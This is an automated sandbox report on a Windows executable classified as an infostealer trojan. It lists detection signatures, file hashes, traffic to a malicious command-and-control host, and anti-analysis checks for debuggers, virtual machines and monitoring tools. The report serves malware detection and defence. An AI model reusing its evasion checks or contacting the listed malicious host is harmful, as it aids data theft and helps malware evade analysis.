
Windows Analysis Report
XJiB3BdLTg.exe

Overview

General Information

Sample name: XJiB3BdLTg.exe
renamed because original name is a hash value
Original sample name: 767f4aff1a89b1abfe6a843f7750bd5b.exe
Analysis ID: 1582830
MD5: 767f4aff1a89b1abfe6a843f7750bd5b
SHA1: d05134107cb88e143b16ca89cb6f3ec675d06d36
SHA256: 68783c123f5c9c302811fc6391329010a372fc583f5af03c4f65d0656a8a165e
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected non-DNS traffic on DNS port
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XJiB3BdLTg.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\XJiB3BdLTg.exe" MD5: 767F4AFF1A89B1ABFE6A843F7750BD5B)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

Source: XJiB3BdLTg.exe | Avira: detected
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | Avira URL Cloud: Label: malware
Source: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4 | Avira URL Cloud: Label: malware
Source: XJiB3BdLTg.exe | Virustotal: Detection: 48%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: XJiB3BdLTg.exe | Joe Sandbox ML: detected
Source: XJiB3BdLTg.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0022A5B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0022B560
Source: XJiB3BdLTg.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_001C29FF
Source: global traffic | TCP traffic: 192.168.2.3:54446 -> 162.159.36.2:53
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 502792
Source: global traffic | HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */*
Source: global traffic | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 31 | Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028A870 recv | 0_2_0028A870
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fortth14vs.top
Source: global traffic | DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: unknown | HTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1 | Host: home.fortth14vs.top | Accept: */* | Content-Type: application/json | Content-Length: 502792
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 14:42:15 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 NOT FOUND | server: nginx/1.22.1 | date: Tue, 31 Dec 2024 14:42:17 GMT | content-type: text/html; charset=utf-8 | content-length: 207 | Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1
Source: XJiB3BdLTg.exe, 00000000.00000003.1630232990.0000000001628000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670295746.0000000001629000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1630195212.0000000001622000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377384fd4
Source: XJiB3BdLTg.exe, 00000000.00000003.1629553495.0000000001633000.00000004.00000020.00020000.00000000.sdmp, XJiB3BdLTg.exe, 00000000.00000002.1670373855.0000000001635000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: XJiB3BdLTg.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: XJiB3BdLTg.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: XJiB3BdLTg.exe, XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443

System Summary

Source: XJiB3BdLTg.exe | Static PE information: section name:
Source: XJiB3BdLTg.exe | Static PE information: section name: .idata
Source: XJiB3BdLTg.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001D05B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001D6FA0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001FF100
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028B180
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0054E050
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0054A000
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_002900E0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00226210
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028C320
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028E3E0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00290420
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00514410
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001CE620
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028C770
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00526730
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0022A7F0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00544780
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0027C900
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001D4940
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001CA960
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0047AAC0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00396AC0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00354B60
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0047AB2C
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00538BF0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001CCBB0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0054CC90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00544D40
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00380D80
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0053CD80
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_004DAE30
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001E4F70
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0028EF90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00288F90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00512F90
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001D10E6
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0052D430
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_005335B0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_005517A0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00279880
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00519920
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00543A70
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00531BD0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00201BE0
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001CC960 appears 32 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 00377220 appears 103 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 002A44A0 appears 67 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001C75A0 appears 642 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 002050A0 appears 90 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001C73F0 appears 110 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001DCD40 appears 78 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001DCCD0 appears 54 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 00205340 appears 45 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 00204F40 appears 291 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 00204FD0 appears 252 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001CCAA0 appears 61 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 001C71E0 appears 46 times
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: String function: 0039CBC0 appears 99 times
Source: XJiB3BdLTg.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: XJiB3BdLTg.exe | Static PE information: Section: lggscavc ZLIB complexity 0.9945723040088293
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@10/2
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_001C255D
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_001C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_001C29FF
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: XJiB3BdLTg.exe | Virustotal: Detection: 48%
Source: XJiB3BdLTg.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: XJiB3BdLTg.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Section loaded: kernel.appcore.dll
Source: XJiB3BdLTg.exe | Static file information: File size 4471296 > 1048576
Source: XJiB3BdLTg.exe | Static PE information: Raw size of is bigger than: 0x100000 < 0x289000
Source: XJiB3BdLTg.exe | Static PE information: Raw size of lggscavc is bigger than: 0x100000 < 0x1b6e00

Data Obfuscation

Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Unpacked PE file: 0.2.XJiB3BdLTg.exe.1c0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lggscavc:EW;pdskyepf:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lggscavc:EW;pdskyepf:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: XJiB3BdLTg.exe | Static PE information: real checksum: 0x4475af should be: 0x4474b8
Source: XJiB3BdLTg.exe | Static PE information: section name:
Source: XJiB3BdLTg.exe | Static PE information: section name: .idata
Source: XJiB3BdLTg.exe | Static PE information: section name:
Source: XJiB3BdLTg.exe | Static PE information: section name: lggscavc
Source: XJiB3BdLTg.exe | Static PE information: section name: pdskyepf
Source: XJiB3BdLTg.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_005441D0 push eax; mov dword ptr [esp], edx | 0_2_005441D5
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00242340 push eax; mov dword ptr [esp], 00000000h | 0_2_00242343
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0027C7F0 push eax; mov dword ptr [esp], 00000000h | 0_2_0027C743
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0021E92D push es; retf | 0_2_0021E92E
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00200AC0 push eax; mov dword ptr [esp], 00000000h | 0_2_00200AC4
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_00221430 push eax; mov dword ptr [esp], 00000000h | 0_2_00221433
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_002439A0 push eax; mov dword ptr [esp], 00000000h | 0_2_002439A3
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Code function: 0_2_0021DAD0 push eax; mov dword ptr [esp], edx | 0_2_0021DAD1
Source: XJiB3BdLTg.exe | Static PE information: section name: lggscavc entropy: 7.956092782324055

Boot Survival

Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: X64DBG.EXE
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WINDBG.EXE
Source: XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: XJiB3BdLTg.exe, 00000000.00000002.1668694106.00000000007A0000.00000040.00000001.01000000.00000003.sdmp, XJiB3BdLTg.exe, 00000000.00000003.1535109649.000000000723F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A79AC1 second address: A79AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A79AC6 second address: A79ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5BD0C7BA66h 0x0000000a jg 00007F5BD0C7BA66h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A79ADA second address: A79AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A88111 second address: A88115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A88115 second address: A8811B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8811B second address: A88136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F5BD0C7BA6Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A882B7 second address: A882BD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A882BD second address: A882E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5BD0C7BA77h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F5BD0C7BA66h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8842E second address: A8843A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007F5BD0FFF0C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A889DF second address: A889E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A889E5 second address: A889E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A889E9 second address: A88A09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5BD0C7BA6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F5BD0C7BA81h 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007F5BD0C7BA66h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C462 second address: A8C468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\XJiB3BdLTg.exe | RDTSC instruction interceptor: First address: A8C468 second address: A8C46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
